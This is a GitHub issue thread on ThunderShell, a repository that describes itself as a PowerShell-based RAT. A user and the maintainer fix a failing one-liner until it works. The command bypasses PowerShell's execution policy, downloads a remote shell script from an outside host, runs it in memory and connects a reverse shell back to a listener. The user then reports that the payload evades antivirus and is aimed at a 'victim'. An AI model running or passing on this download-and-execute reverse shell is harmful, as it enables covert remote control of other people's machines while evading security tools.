Mr-Un1k0d3r / ThunderShell

Python / C# Unmanaged PowerShell based RAT
Other
772 stars 223 forks source link

Why did this error occur? #1

Closed djwesleyborges closed 7 years ago

djwesleyborges commented 7 years ago

Why did this error occur?

C:\Windows\system32>powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.100/PS-RemoteShell.ps1"); PS-RemoteShell.ps1 -ip 192.168.1.100 -port 8080 -Key test -Delay 2000 No linha:1 caractere:47

Mr-Un1k0d3r commented 7 years ago

Fixed the ReadMe you should use single quote instead of double quote.

powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/PS-RemoteShell.ps1'); PS-RemoteShell.ps1 -ip 192.168.1.100 -port 8080 -Key test -Delay 2000

djwesleyborges commented 7 years ago

Thank you it worked, the payload connects normal and the AV does not detect, but the interaction commands with the victim did not work. I'll work on the code and see if I can change anything. Sorry for my english, I'm using google translate, I'm brazilian and I'm not fit for your language yet rsrsrs